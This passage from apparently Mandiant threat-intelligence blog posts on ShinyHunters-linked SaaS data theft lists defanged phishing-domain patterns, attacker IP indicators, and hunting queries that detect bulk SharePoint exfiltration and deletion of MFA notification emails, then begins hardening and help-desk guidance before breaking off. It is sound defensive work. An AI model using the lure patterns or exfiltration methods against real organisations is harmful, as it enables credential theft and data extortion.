we have included indicators of compromise (IOCs) in a free </span><a href="https://www.virustotal.com/gui/collection/214da7a4bb12360a85e03a15da1ff74284e09651a33f4f760ee01230439c16af" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">GTI Collection</span></a><span style="vertical-align: baseline;"> for registered users.</span></p> <h4><span style="vertical-align: baseline;">Phishing Domain Lure Patterns </span></h4> <p><span style="vertical-align: baseline;">Threat actors associated with these clusters frequently register domains designed to impersonate legitimate corporate portals. At time of publication all identified phishing domains have been added to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Chrome Safe Browsing</span></a><span style="vertical-align: baseline;">. These domains typically follow specific naming conventions using a variation of the organization name:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Pattern</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Examples (Defanged)</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Corporate SSO</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">&lt;companyname&gt;sso[.]com, my&lt;companyname&gt;sso[.]com, my-&lt;companyname&gt;sso[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Internal Portals</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">&lt;companyname&gt;internal[.]com, www.&lt;companyname&gt;internal[.]com, my&lt;companyname&gt;internal[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Support/Helpdesk</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">&lt;companyname&gt;support[.]com, ticket-&lt;companyname&gt;[.]support, support-&lt;companyname&gt;[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identity Providers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">&lt;companyname&gt;okta[.]com, &lt;companyname&gt;azure[.]com, on&lt;companyname&gt;zendesk[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Access Portal</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">&lt;companyname&gt;access[.]com, www.&lt;companyname&gt;access[.]com, my&lt;companyname&gt;acess[.]com</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Network Indicators</span></h4> <p><span style="vertical-align: baseline;">Many of the network indicators identified in this campaign are associated with commercial VPN services or residential proxy networks, including Mullvad, Oxylabs, NetNut, 9Proxy, Infatica, and nsocks. Mandiant recommends that organizations exercise caution when using these indicators for broad blocking and prioritize them for hunting and correlation within their environments.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IOC</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ASN</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Association</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">24.242.93[.]122</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">11427</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6661</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23.234.100[.]107</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">11878</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6661</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23.234.100[.]235</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">11878</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6661</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">73.135.228[.]98</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">33657</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6661</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">157.131.172[.]74</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46375</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6661</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">149.50.97[.]144</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">201814</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6661</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">67.21.178[.]234</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">400595</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6661</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">142.127.171[.]133</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">577</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">76.64.54[.]159</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">577</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">76.70.74[.]63</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">577</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">206.170.208[.]23</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">7018</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">68.73.213[.]196</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">7018</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">37.15.73[.]132</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">12479</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.32.172[.]247</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">20001</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">85.238.66[.]242</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">20845</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">199.127.61[.]200</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23470</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">209.222.98[.]200</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23470</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">38.190.138[.]239</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">27924</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">198.52.166[.]197</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">395965</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6671</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Google Security Operations</span></h4> <p><a href="https://cloud.google.com/security/products/security-operations"><span style="text-decoration: underline; vertical-align: baseline;">Google Security Operations</span></a><span style="vertical-align: baseline;"> customers have access to these broad category rules and more under the Okta, Cloud Hacktool, and O365 rule packs. A walkthrough for </span><a href="https://security.googlecloudcommunity.com/community-blog-42/new-to-google-secops-leveraging-okta-curated-detections-to-detect-shinyhunters-related-activity-6693" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">operationalizing these findings</span></a><span style="vertical-align: baseline;"> within the Google Security Operations is available in Part Three of this series. The activity discussed in the blog post is detected in Google Security Operations under the rule names:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Okta Admin Console Access Failure</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Okta Super or Organization Admin Access Granted</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Okta Suspicious Actions from Anonymized IP</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Okta User Assigned Administrator Role</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">O365 SharePoint Bulk File Access or Download via PowerShell</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">O365 SharePoint High Volume File Access Events</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">O365 SharePoint High Volume File Download Events</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">O365 Sharepoint Query for Proprietary or Privileged Information</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">O365 Deletion of MFA Modification Notification Email</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Workspace ToogleBox Recall OAuth Application Authorized</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code> $e.metadata.product_name = "Okta" $e.metadata.product_event_type = /\.(add|update_|(policy.rule|zone)\.update|create|register|(de)?activate|grant|reset_all|user.session.access_admin_app)$/ ( $e.security_result.detection_fields["anonymized IP"] = "true" or $e.extracted.fields["debugContext.debugData.tunnels"] = /\"anonymous\":true/ ) $e.security_result.action = “ALLOW”</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: Hunting query for suspicious Okta actions conducted from anonymized IPs</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>$e.metadata.vendor_name = "Google Workspace" $e.metadata.event_type = "USER_RESOURCE_ACCESS" $e.metadata.product_event_type = "authorize" $e.target.resource.name = /ToogleBox Recall/ nocase</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 8: Hunting query for Google Workspace authorization events for ToogleBox Recall</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>$e.principal.ip_geo_artifact.network.organization_name = /mullvad.vpn|oxylabs|9proxy|netnut|infatica|nsocks/ nocase or $e.extracted.fields["debugContext.debugData.tunnels"] = /mullvad.vpn|oxylabs|9proxy|netnut|infatica|nsocks/ nocase</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 9: Hunting query for suspicious VPN / proxy services observed in this campaign</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>$e.network.http.user_agent = /Geny\s?Mobile/ nocase $event.security_result.action != "BLOCK"</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 10: Hunting query for suspicious user-agent string observed in this campaign</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code> $e.metadata.log_type = "OFFICE_365" ($e.metadata.product_event_type = "FileDownloaded" or $e.metadata.product_event_type = "FileAccessed") ( $e.target.application = "SharePoint" or $e.principal.application = "SharePoint" ) $e.network.http.user_agent = /PowerShell/ nocase</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 11: Hunting query for programmatic file access or downloads from SharePoint where the User-Agent identifies as PowerShell</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.log_type = "OFFICE_365" $e.metadata.product_event_type = "FileAccessed" ( $e.target.application = "SharePoint" or $e.principal.application = "SharePoint" ) $e.target.file.full_path = /\.(doc[mx]?|xls[bmx]?|ppt[amx]?|pdf)$/ nocase $file_extension_extract = re.capture($e.target.file.full_path, `\.([^\.]+)$`) $event.security_result.action != "BLOCK" $session_id = $e.network.session_id match: $session_id over 5m outcome: $target_url_count = count_distinct(strings.coalesce($e.target.file.full_path)) $extension_count = count_distinct($file_extension_extract) condition: $e and $target_url_count &gt;= 50 and $extension_count &gt;= 3</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 12: Hunting query for high volume document file access from SharePoint</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.log_type = "OFFICE_365" $e.metadata.product_event_type = "FileDownloaded" ( $e.target.application = "SharePoint" or $e.principal.application = "SharePoint" ) $e.target.file.full_path = /\.(doc[mx]?|xls[bmx]?|ppt[amx]?|pdf)$/ nocase $file_extension_extract = re.capture($e.target.file.full_path, `\.([^\.]+)$`) $event.security_result.action != "BLOCK" $session_id = $e.network.session_id match: $session_id over 5m outcome: $target_url_count = count_distinct(strings.coalesce($e.target.file.full_path)) $extension_count = count_distinct($file_extension_extract) condition: $e and $target_url_count &gt;= 50 and $extension_count &gt;= 3</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 13: Hunting query for high volume document file downloads from SharePoint</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>$e.metadata.log_type = "OFFICE_365" $e.metadata.product_event_type = "SearchQueryPerformed" $e.additional.fields["search_query_text"] = /\bpoc\b|proposal|confidential|internal|salesforce|vpn/ nocase</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 14: Hunting query for SharePoint queries for strings of interest</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>$e.metadata.log_type = "OFFICE_365" $e.target.application = "Exchange" $e.metadata.product_event_type = /^(SoftDelete|HardDelete|MoveToDeletedItems)$/ nocase $e.network.email.subject = /new\s+(mfa|multi-|factor|method|device|security)|\b2fa\b|\b2-Step\b|(factor|method|device|security|mfa)\s+(enroll|registered|added|change|verify|updated|activated|configured|setup)/ nocase // filtering specifically for new device registration strings $e.network.email.subject = /enroll|registered|added|change|verify|updated|activated|configured|setup/ nocase // tuning out new device logon events $e.network.email.subject != /(sign|log)(-|\s)?(in|on)/ nocase</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 15: Hunting query for O365 Exchange deletion of MFA modification notification email</span></span></p></div>Fri, 30 Jan 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft/Mandiant https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span></h3> <p><span style="vertical-align: baseline;">Mandiant is tracking a significant expansion and escalation in the operations of threat clusters associated with ShinyHunters-branded extortion. As detailed in our companion report,</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft"><span style="vertical-align: baseline;"> </span><span style="text-decoration: underline; vertical-align: baseline;">'Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft'</span></a><span style="vertical-align: baseline;">, these campaigns leverage evolved voice phishing (vishing) and victim-branded credential harvesting to successfully compromise single sign-on (SSO) credentials and enroll unauthorized devices into victim multi-factor authentication (MFA) solutions.</span></p> <p><span style="vertical-align: baseline;">This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, these intrusions rely on the effectiveness of social engineering to bypass identity controls and pivot into cloud-based software-as-a-service (SaaS) environments.</span></p> <p><span style="vertical-align: baseline;">This post provides actionable <a href="https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas#:~:text=1.%20hardening">hardening</a>, <a href="https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas#:~:text=2.%20logging">logging</a>, and <a href="https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas#:~:text=3.%20detections">detection</a> recommendations to help organizations protect against these threats. Organizations responding to an active incident should focus on rapid containment steps, such as severing access to infrastructure environments, SaaS platforms, and the specific identity stores typically used for lateral movement and persistence. Long-term defense requires a transition toward </span><a href="https://workspace.google.com/blog/identity-and-security/defending-against-account-takeovers-top-threats-passkeys-and-dbsc" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">phishing-resistant MFA</span></a><span style="vertical-align: baseline;">, such as FIDO2 security keys or passkeys, which are more resistant to social engineering than push-based or SMS authentication.</span></p> <h3><span style="vertical-align: baseline;">Containment</span></h3> <p><span style="vertical-align: baseline;">Organizations responding to an active or suspected intrusion by these threat clusters should prioritize rapid containment to sever the attacker’s access to prevent further data exfiltration. Because these campaigns rely on valid credentials rather than malware, containment must prioritize the revocation of session tokens and the restriction of identity and access management operations.</span></p> <h4><span style="vertical-align: baseline;">Immediate Containment Actions</span></h4> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Revoke active sessions:</strong><span style="vertical-align: baseline;"> Identify and disable known compromised accounts and revoke all active session tokens and OAuth authorizations across IdP and SaaS platforms.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Restrict password resets:</strong><span style="vertical-align: baseline;"> Temporarily disable or heavily restrict public-facing self-service password reset portals to prevent further credential manipulation.  Do not allow the use of self-service password reset for administrative accounts.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Pause MFA registration:</strong><span style="vertical-align: baseline;"> Temporarily disable the ability for users to register, enroll, or join new devices to the identity provider (IdP).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Limit remote access:</strong><span style="vertical-align: baseline;"> Restrict or temporarily disable remote access ingress points, such as VPNs, or Virtual Desktops Infrastructure (VDI), especially from untrusted or non-compliant devices.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Enforce device compliance:</strong><span style="vertical-align: baseline;"> Restrict access to IdPs and SaaS applications so that authentication can only originate from organization-managed, compliant devices and known trusted egress locations.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Implement 'shields up' procedures:</strong><span style="vertical-align: baseline;"> Inform the service desk of heightened risk and shift to manual, high-assurance verification protocols for all account-related requests. In addition, remind technology operations staff not to accept any work direction via SMS messages from colleagues.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">During periods of heightened threat activity, Mandiant recommends that organizations temporarily route all password and MFA resets through a rigorous manual identity verification protocol, such as the live video verification described in the Hardening section of this post. When appropriate, organizations should also communicate with end-users, HR partners, and other business units to stay on high-alert during the initial containment phase. Always report suspicious activity to internal IT and Security for further investigation.</span></p> <h3><span style="vertical-align: baseline;">1. Hardening</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Defending against threat clusters associated with ShinyHunters-branded extortion begins with tightening manual, high-risk processes that attackers frequently exploit, particularly password resets, device enrollments, and MFA changes.</span></p> <h4><span style="vertical-align: baseline;">Help Desk Verification</span></h4> <p><span style="vertical-align: baseline;">Because these campaigns often target human-driven workflows through social engineering, vishing, and phishing, organizations should implement stronger, layered identity verification processes for support interactions, especially for requests involving account changes such as password resets or MFA modifications. Threat actors have also been known to impersonate third-party vendors to voice phish (vish) help desks and persuade staff to approve or install malicious SaaS application registrations.</span></p> <p><span style="vertical-align: baseline;">As a temporary measure during heightened risk, organizations should require verification that includes the caller’s identity, a valid ID, and a visual confirmation that the caller and ID match. </span></p> <p><span style="vertical-align: baseline;">To implement this, organizations should require help desk personnel to:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require a live video call where the user holds a physical government ID next to their face. The agent must visually verify the match.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Confirm the name on the ID matches the employee’s corporate record.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require out-of-band approval from the user's known manager before processing the reset.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Reject requests based solely on employee ID, SSN, or manager name. ShinyHunters possess this data from previous breaches and may use it to verify their identity.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If the user calls the helpdesk for a password reset, never perform the reset without calling the user back at a known good phone number to prevent spoofing.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If a live video call is not possible, require an alternative high-assurance path. It may be required for the user to come in person to verify their identity.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Optionally, after a completed interaction, the help desk agent can send an email to the user’s manager indicating that the change is complete with a picture from the video call of the user who requested the change on camera.</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">Special Handling for Third-Party Vendor Requests</span></h5> <p><span style="vertical-align: baseline;">Mandiant has observed incidents where attackers impersonate support personnel from third-party vendors to gain access. In these situations, the standard verification principals may not be applicable.</span></p> <p><span style="vertical-align: baseline;">Under no circumstances should the Help Desk move forward with allowing access. The agent must halt the request and follow this procedure:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">End the 